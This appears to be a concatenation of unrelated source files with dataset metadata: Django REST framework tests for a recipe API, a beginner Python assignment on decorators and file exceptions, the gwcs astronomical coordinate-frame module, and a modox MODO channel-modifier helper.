recipe.tags.add(sample_tag(user=self.user))
recipe.ingredients.add(sample_ingredient(user=self.user))
url = detail_url(recipe.id)
res = self.client.get(url)
serializer = RecipeDetailSerializer(recipe)
# in this case we just want to serialize a single object
self.assertEqual(res.data, serializer.data)
def test_create_basic_recipe(self):
"""Test creating recipe"""
payload = {
'title': 'Test recipe',
'time_minutes': 30,
'price': 10.00,
}
res = self.client.post(RECIPES_URL, payload)
# post this payload dictionary to our recipes URL.
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
# this is the standard HTTP response code for creating objects
# in an API.
recipe = Recipe.objects.get(id=res.data['id'])
# When you create an object using the Django rest framework the
# default behavior is that it will return a dictionary containing
# the created object This is how I know that if we do res.data and
# retrieve the id key this will get the id of the created object.
# Next what we're going to do is we're going to loop through each
# one of these keys and then we're going to check
# that is the correct value assigned to our recipe model.
for key in payload.keys():
self.assertEqual(payload[key], getattr(recipe, key))
# assertion for each one of these keys, check that it is
# equal to the same key in the recipe
# payload[key]: This will actually get the value of the
# key in our payload object
# getattr: that allows you to retrieve an attribute from
# an object by passing in a variable. (instead of recipe.key)
def test_create_recipe_with_tags(self):
"""Test creating a recipe with tags"""
tag1 = sample_tag(user=self.user, name='Tag 1')
tag2 = sample_tag(user=self.user, name='Tag 2')
payload = {
'title': 'Test recipe with two tags',
'tags': [tag1.id, tag2.id],
'time_minutes': 30,
'price': 10.00
}
res = self.client.post(RECIPES_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
# retrieve the created recipe
tags = recipe.tags.all()
# retrieve the tags that were created with the recipe
self.assertEqual(tags.count(), 2)
# because we expect two tags to be assigned.
self.assertIn(tag1, tags)
self.assertIn(tag2, tags)
# check if the tags that we created as our sample tags are
# the same as the tags that are in our queryset.
def test_create_recipe_with_ingredients(self):
"""Test creating recipe with ingredients"""
ingredient1 = sample_ingredient(user=self.user, name='Ingredient 1')
ingredient2 = sample_ingredient(user=self.user, name='Ingredient 2')
payload = {
'title': 'Test recipe with ingredients',
'ingredients': [ingredient1.id, ingredient2.id],
'time_minutes': 45,
'price': 15.00
}
res = self.client.post(RECIPES_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
ingredients = recipe.ingredients.all()
# get the ingredients queryset
self.assertEqual(ingredients.count(), 2)
self.assertIn(ingredient1, ingredients)
self.assertIn(ingredient2, ingredients)
# test partial update and full update of an object
# there are two ways in which you can update an object using the
# API there's two different HTTP methods: put, patch
# patch: Patch is used to update the fields that are provided
# in the payload so the only fields that it will change are the
# fields that are provided and any fields that are omitted from
# the request will not be modified in the object that's being updated.
def test_partial_update_recipe(self):
"""Test updating a recipe with patch"""
# make a request to change a field in our recipe.
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
# add a tag to the recipe
new_tag = sample_tag(user=self.user, name='Curry')
# add a new tag and what we're going to do is we're going
# to swap out this tag that we create here and we're going
# to replace it with a new tag
payload = {'title': 'Partially Updated sample recipe',
'tags': [new_tag.id]}
# tags will be replaced with this new tag so the existing tag that
# we created won't be assigned to it
url = detail_url(recipe.id)
# the way that you update an object using the Django rest framework
# view sets is you use the detail URL so that is the URL of the
# recipe with the ID of the recipe that we want to update.
self.client.patch(url, payload)
# make request
# We're going to retrieve an update to the recipe from the
# database and then we're going to check the fields that
# are assigned and just make sure they match what we expect.
recipe.refresh_from_db()
# refreshes the details in our recipe from the database
# typically when you create a new model and you have a
# reference to a model the details of that won't change
# unless you do refresh from dB if the values have changed
# in the database.
self.assertEqual(recipe.title, payload['title'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 1)
self.assertIn(new_tag, tags)
# check that the tag new tag is in the tags that we retrieved
# test full update
# put: it will replace the object that we're updating with the full
# object that is provided in the request that means if you exclude
# any fields in the payload those fields will actually be removed
# from the object that you're updating
def test_full_update_recipe(self):
"""Test updating a recipe with put"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
payload = {
'title': 'Fully Updated sample recipe',
'time_minutes': 25,
'price': 5.00
}
url = detail_url(recipe.id)
self.client.put(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
self.assertEqual(recipe.time_minutes, payload['time_minutes'])
self.assertEqual(recipe.price, payload['price'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 0)
# we will check that the tags assigned are zero now as I explained
# because when we do a HTTP put if we omit a field
# that should clear the value of that field so now our recipe
# that did have a sample tag assigned should not have any tags
# assigned
class RecipeImageUploadTests(TestCase):
# what happens at the setup of the test
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user('user', 'testpass')
self.client.force_authenticate(self.user)
# authenticate our user
self.recipe = sample_recipe(user=self.user)
# after the test runs it runs tear down
def tearDown(self):
self.recipe.image.delete()
# make sure that our file system is kept clean after our test
# removing all of the test files that we create
# delete the image if it exists in the recipe
def test_upload_image_to_recipe(self):
"""Test uploading an image to recipe"""
url = image_upload_url(self.recipe.id)
# going to use the sample recipe that gets created
# it creates a named temporary file on the system at a random
# location usually in the /temp folder
# create a temporary file we're going to write an image
# to that file and then we're going to upload that file
# through the API like you would with a HTTP POST and then
# we're going to run some assertions to check that it
# uploaded correctly
with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:
img = Image.new('RGB', (10, 10))
# creates black square
img.save(ntf, format='JPEG')
ntf.seek(0)
# it's the way that Python reads files so because we've
# saved the file it will be the seeking will be done to the
# end of the file so if you try to access it then it would
# just be blank because you've already read up to the end
# of the file so use this seek function to set
# the pointer back to the beginning of the file
res = self.client.post(url, {'image': ntf}, format='multipart')
# assertions
# refreshing the database for our recipe
self.recipe.refresh_from_db()
self.assertEqual(res.status_code, status.HTTP_200_OK)
# check that the images in the response so that's the path to
# the image that should be accessible
self.assertIn('image', res.data)
# check that the path exists for the image that is saved to our model
self.assertTrue(os.path.exists(self.recipe.image.path))
def test_upload_image_bad_request(self):
"""Test uploading an invalid image"""
url = image_upload_url(self.recipe.id)
res = self.client.post(url, {'image': 'notimage'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_filter_recipes_by_tags(self):
"""Test returning recipes with specific tags"""
recipe1 = sample_recipe(user=self.user, title='Thai vegetable curry')
recipe2 = sample_recipe(user=self.user, title='Aubergine with tahini')
tag1 = sample_tag(user=self.user, name='Vegan')
tag2 = sample_tag(user=self.user, name='Vegetarian')
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
recipe3 = sample_recipe(user=self.user, title='Fish and chips')
res = self.client.get(
RECIPES_URL,
{'tags': '{},{}'.format(tag1.id, tag2.id)}
)
# this will create a comma separated list string and assign
# it to the tags get parameter
# if our filtering is working
# should only return the first two recipe
# test the response:
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
# serialize the recipes and we're going to check if
# they exist in the responses returned
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
# check the return result
def test_filter_recipes_by_ingredients(self):
"""Test returning recipes with specific ingredients"""
recipe1 = sample_recipe(user=self.user, title='Posh beans on toast')
recipe2 = sample_recipe(user=self.user, title='Chicken cacciatore')
ingredient1 = sample_ingredient(user=self.user, name='Feta cheese')
ingredient2 = sample_ingredient(user=self.user, name='Chicken')
recipe1.ingredients.add(ingredient1)
recipe2.ingredients.add(ingredient2)
recipe3 = sample_recipe(user=self.user, title='Steak and mushrooms')
# test API
res = self.client.get(
RECIPES_URL,
{'ingredients': '{},{}'.format(ingredient1.id, ingredient2.id)}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
| 2.75 | 3 |
Assignment 1 n 2 Day 8.py | paju3125/LetsUpgrade-Python-B7 | 0 | 1197 | <gh_stars>0
# Assignment 1 Day 8
# Write a decorator function that takes input for
# any kind of function you want to build
def getInput(calculate_arg_fuc):
def wrap_function():
print("Enter two numbers ")
a=int(input("Enter first number = "))
b=int(input("Enter second number = "))
calculate_arg_fuc(a,b)
return wrap_function
@getInput
def addition(num1,num2):
print("Addition = ",num1+num2)
@getInput
def subtraction(num1,num2):
print("Subtraction = ",num1-num2)
@getInput
def multiplication(num1,num2):
print("Multiplication = ",num1*num2)
@getInput
def division(num1,num2):
print("Division = ",num1/num2)
addition()
subtraction()
multiplication()
division()
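# Illustrative extra example (not part of the original assignment): the same
# input-gathering decorator can wrap any other two-number operation.
@getInput
def modulus(num1, num2):
    print("Modulus = ", num1 % num2)
modulus()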
# Assignment 2 day 8
# You need to develop a Python program to open a file in read-only mode,
# try writing something to it, and handle the subsequent error using exception handling
try:
f=open("abc.txt","r");
f.write("Heyy, i am prajval");
f.close();
except:
print("File is in read only mode...")
| 3.953125 | 4 |
gwcs/coordinate_frames.py | migueldvb/gwcs | 0 | 1198 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Defines coordinate frames and ties them to data axes.
"""
from __future__ import absolute_import, division, unicode_literals, print_function
import numpy as np
from astropy import units as u
from astropy import utils as astutil
from astropy import coordinates as coord
from astropy.extern import six
from . import utils as gwutils
__all__ = ['Frame2D', 'CelestialFrame', 'SpectralFrame', 'CompositeFrame',
'CoordinateFrame']
STANDARD_REFERENCE_FRAMES = [frame.upper() for frame in coord.builtin_frames.__all__]
STANDARD_REFERENCE_POSITION = ["GEOCENTER", "BARYCENTER", "HELIOCENTER",
"TOPOCENTER", "LSR", "LSRK", "LSRD",
"GALACTIC_CENTER", "LOCAL_GROUP_CENTER"]
class CoordinateFrame(object):
"""
Base class for CoordinateFrames.
Parameters
----------
naxes : int
Number of axes.
axes_type : str
One of ["SPATIAL", "SPECTRAL", "TIME"]
axes_order : tuple of int
A dimension in the input data that corresponds to this axis.
reference_frame : astropy.coordinates.builtin_frames
Reference frame (usually used with output_frame to convert to world coordinate objects).
reference_position : str
Reference position - one of `STANDARD_REFERENCE_POSITION`
unit : list of astropy.units.Unit
Unit for each axis.
axes_names : list
Names of the axes in this frame.
name : str
Name of this frame.
"""
def __init__(self, naxes, axes_type, axes_order, reference_frame=None,
reference_position=None, unit=None, axes_names=None,
name=None):
self._naxes = naxes
self._axes_order = tuple(axes_order)
if isinstance(axes_type, six.string_types):
self._axes_type = (axes_type,)
else:
self._axes_type = tuple(axes_type)
self._reference_frame = reference_frame
if unit is not None:
if astutil.isiterable(unit):
unit = tuple(unit)
else:
unit = (unit,)
if len(unit) != naxes:
raise ValueError("Number of units does not match number of axes.")
else:
self._unit = tuple([u.Unit(au) for au in unit])
if axes_names is not None:
if isinstance(axes_names, six.string_types):
axes_names = (axes_names,)
else:
axes_names = tuple(axes_names)
if len(axes_names) != naxes:
raise ValueError("Number of axes names does not match number of axes.")
else:
axes_names = tuple([""] * naxes)
self._axes_names = axes_names
if name is None:
self._name = self.__class__.__name__
else:
self._name = name
if reference_position is not None:
self._reference_position = reference_position
else:
self._reference_position = None
super(CoordinateFrame, self).__init__()
def __repr__(self):
fmt = '<{0}(name="{1}", unit={2}, axes_names={3}, axes_order={4}'.format(
self.__class__.__name__, self.name,
self.unit, self.axes_names, self.axes_order)
if self.reference_position is not None:
fmt += ', reference_position="{0}"'.format(self.reference_position)
if self.reference_frame is not None:
fmt += ", reference_frame={0}".format(self.reference_frame)
fmt += ")>"
return fmt
def __str__(self):
if self._name is not None:
return self._name
else:
return self.__class__.__name__
@property
def name(self):
""" A custom name of this frame."""
return self._name
@name.setter
def name(self, val):
""" A custom name of this frame."""
self._name = val
@property
def naxes(self):
""" The number of axes intheis frame."""
return self._naxes
@property
def unit(self):
"""The unit of this frame."""
return self._unit
@property
def axes_names(self):
""" Names of axes in the frame."""
return self._axes_names
@property
def axes_order(self):
""" A tuple of indices which map inputs to axes."""
return self._axes_order
@property
def reference_frame(self):
return self._reference_frame
@property
def reference_position(self):
try:
return self._reference_position
except AttributeError:
return None
def input_axes(self, start_frame=None):
"""
Computes which axes in `start_frame` contribute to each axis in the current frame.
Parameters
----------
start_frame : ~gwcs.coordinate_frames.CoordinateFrame
A frame in the WCS pipeline
The transform between start_frame and the current frame is used to compute the
mapping inputs: outputs.
"""
sep = self._separable(start_frame)
inputs = []
for ax in self.axes_order:
inputs.append(list(sep[ax].nonzero()[0]))
return inputs
@property
def axes_type(self):
""" Type of this frame : 'SPATIAL', 'SPECTRAL', 'TIME'. """
return self._axes_type
def coordinates(self, *args):
""" Create world coordinates object"""
raise NotImplementedError("Subclasses may implement this")
class CelestialFrame(CoordinateFrame):
"""
Celestial Frame Representation
Parameters
----------
axes_order : tuple of int
A dimension in the input data that corresponds to this axis.
reference_frame : astropy.coordinates.builtin_frames
A reference frame.
reference_position : str
Reference position.
unit : str or units.Unit instance or iterable of those
Units on axes.
axes_names : list
Names of the axes in this frame.
name : str
Name of this frame.
"""
def __init__(self, axes_order=None, reference_frame=None,
unit=None, axes_names=None,
name=None):
naxes = 2
if reference_frame is not None:
if reference_frame.name.upper() in STANDARD_REFERENCE_FRAMES:
_axes_names = list(reference_frame.representation_component_names.values())
if 'distance' in _axes_names:
_axes_names.remove('distance')
if axes_names is None:
axes_names = _axes_names
naxes = len(_axes_names)
_unit = list(reference_frame.representation_component_units.values())
if unit is None and _unit:
unit = _unit
if axes_order is None:
axes_order = tuple(range(naxes))
if unit is None:
unit = tuple([u.degree] * naxes)
axes_type = ['SPATIAL'] * naxes
super(CelestialFrame, self).__init__(naxes=naxes, axes_type=axes_type,
axes_order=axes_order,
reference_frame=reference_frame,
unit=unit,
axes_names=axes_names,
name=name)
def coordinates(self, *args):
"""
Create a SkyCoord object.
Parameters
----------
args : float
inputs to wcs.input_frame
"""
        # Reorder axes if necessary.
        return coord.SkyCoord(*args, unit=self.unit, frame=self._reference_frame)
class SpectralFrame(CoordinateFrame):
"""
Represents Spectral Frame
Parameters
----------
axes_order : tuple or int
A dimension in the input data that corresponds to this axis.
reference_frame : astropy.coordinates.builtin_frames
Reference frame (usually used with output_frame to convert to world coordinate objects).
unit : str or units.Unit instance
Spectral unit.
axes_names : str
Spectral axis name.
name : str
Name for this frame.
"""
def __init__(self, axes_order=(0,), reference_frame=None, unit=None,
axes_names=None, name=None, reference_position=None):
super(SpectralFrame, self).__init__(naxes=1, axes_type="SPECTRAL", axes_order=axes_order,
axes_names=axes_names, reference_frame=reference_frame,
unit=unit, name=name,
reference_position=reference_position)
def coordinates(self, *args):
if np.isscalar(args):
return args * self.unit[0]
else:
return args[0] * self.unit[0]
class CompositeFrame(CoordinateFrame):
"""
Represents one or more frames.
Parameters
----------
frames : list
List of frames (TimeFrame, CelestialFrame, SpectralFrame, CoordinateFrame).
name : str
Name for this frame.
"""
def __init__(self, frames, name=None):
self._frames = frames[:]
naxes = sum([frame._naxes for frame in self._frames])
axes_type = list(range(naxes))
unit = list(range(naxes))
axes_names = list(range(naxes))
axes_order = []
for frame in frames:
axes_order.extend(frame.axes_order)
for frame in frames:
for ind, axtype, un, n in zip(frame.axes_order, frame.axes_type,
frame.unit, frame.axes_names):
axes_type[ind] = axtype
axes_names[ind] = n
unit[ind] = un
if len(np.unique(axes_order)) != len(axes_order):
raise ValueError("Incorrect numbering of axes, "
"axes_order should contain unique numbers, "
"got {}.".format(axes_order))
super(CompositeFrame, self).__init__(naxes, axes_type=axes_type,
axes_order=axes_order,
unit=unit, axes_names=axes_names,
name=name)
@property
def frames(self):
return self._frames
def __repr__(self):
return repr(self.frames)
def coordinates(self, *args):
coo = []
for frame in self.frames:
fargs = [args[i] for i in frame.axes_order]
coo.append(frame.coordinates(*fargs))
return coo
class Frame2D(CoordinateFrame):
"""
A 2D coordinate frame.
Parameters
----------
axes_order : tuple of int
A dimension in the input data that corresponds to this axis.
unit : list of astropy.units.Unit
Unit for each axis.
axes_names : list
Names of the axes in this frame.
name : str
Name of this frame.
"""
def __init__(self, axes_order=(0, 1), unit=(u.pix, u.pix), axes_names=('x', 'y'),
name=None):
super(Frame2D, self).__init__(2, ["SPATIAL", "SPATIAL"], axes_order, name=name,
axes_names=axes_names, unit=unit)
def coordinates(self, *args):
args = [args[i] for i in self.axes_order]
coo = tuple([arg * un for arg, un in zip(args, self.unit)])
return coo
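# Illustrative sketch (not part of the original module): building the frames
# defined above and turning raw axis values into world coordinate objects.
# Exact reprs depend on the astropy version this module targets.
if __name__ == "__main__":
    detector = Frame2D(name="detector", axes_names=("x", "y"), unit=(u.pix, u.pix))
    sky = CelestialFrame(reference_frame=coord.ICRS(), name="icrs")
    spec = SpectralFrame(axes_order=(2,), unit=u.micron, axes_names="lambda")
    print(detector.coordinates(10, 20))   # (10 pix, 20 pix)
    print(sky.coordinates(5.63, -72.05))  # SkyCoord in the ICRS frame, in degrees
    print(CompositeFrame([sky, spec], name="world"))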
| 2.828125 | 3 |
modox/chan_modifier.py | lukpazera/modox | 11 | 1199 |
import lx
import modo
import select
import item
from run import run
class ChannelModifierUtils(object):
@classmethod
def attachModifierToItem(cls, modifierModoItem, hostModoItem):
"""
Allows for attaching modifier to locator type item.
Attached item will show up under the locator item in item list
(you can unfold it with a little plus icons next to item name in item list).
Attached modifiers are getting deleted together with locator they are attached to.
Parameters
----------
modifierModoItem : modo.Item
Modifier item that you want to attach.
hostModoItem : modo.Item
Locator type item you want to attach modifier to.
"""
item.ItemUtils.addForwardGraphConnections(modifierModoItem, hostModoItem, 'chanMods')
class TransformConstraintOperation(object):
POSITION = 'pos'
ROTATION = 'rot'
SCALE = 'scl'
class CMTransformConstraint(object):
"""
This class represents Transform Constraint channel modifier.
Parameters
----------
modoItem : modo.Item
The constraint modo item.
"""
Operation = TransformConstraintOperation
@classmethod
def new(cls, assemblyItem, hostItem, name='TransformConstraint'):
"""
Adds new transform constraint to the scene.
Parameters
----------
assemblyItem : modo.Item
This is assembly item to which the constraint will be added.
Passing this item is mandatory. However, if you don't want to add constraints
to any assembly pass an item that is not a group.
This doesn't throw an error and it doesn't add constraint to any groups either.
hostItem : modo.Item
Constraint can be attached to an item such that it'll be under this item
in item list. It'll also get deleted when the host item is deleted.
name : str
Name for new constraint item.
Returns
-------
CMTransformConstraint
"""
itemSelection = select.ItemSelection()
itemSelection.clear()
run('modifier.create "cmTransformConstraint:rot" item:{%s} insert:false' % assemblyItem.id)
cnsItem = itemSelection.getOfTypeModo("cmTransformConstraint")[0]
cnsItem.name = name
ChannelModifierUtils.attachModifierToItem(cnsItem, hostItem)
return CMTransformConstraint(cnsItem)
@property
def operation(self):
"""
Gets the type of the constraint.
Returns
-------
str
One of TransformConstraintOperation constants.
"""
return self._item.channel('operation').get()
@property
def inputChannel(self):
return self._item.channel('matrixInput')
@property
def outputChannel(self):
return self._item.channel('matrixOutput')
@property
def isRotationConstraint(self):
"""
Tests if this is rotation constraint.
Returns
-------
bool
"""
return self.operation == self.Operation.ROTATION
@property
def offset(self):
"""
Gets the constraint offset vector.
Returns
-------
modo.Vector3
"""
x = self._item.channel('offset.X').get()
y = self._item.channel('offset.Y').get()
z = self._item.channel('offset.Z').get()
return modo.Vector3(x, y, z)
@offset.setter
def offset(self, offsetVec):
"""
Sets new offset for the constraint.
Parameters
----------
offsetVec : modo.Vector3
"""
self._item.channel('offset.X').set(offsetVec[0], 0.0, key=False, action=lx.symbol.s_ACTIONLAYER_SETUP)
self._item.channel('offset.Y').set(offsetVec[1], 0.0, key=False, action=lx.symbol.s_ACTIONLAYER_SETUP)
self._item.channel('offset.Z').set(offsetVec[2], 0.0, key=False, action=lx.symbol.s_ACTIONLAYER_SETUP)
@property
def modoItem(self):
return self._item
# -------- Private methods
def __init__(self, modoItem):
if modoItem.type != 'cmTransformConstraint':
raise TypeError
self._item = modoItem | 2.671875 | 3 |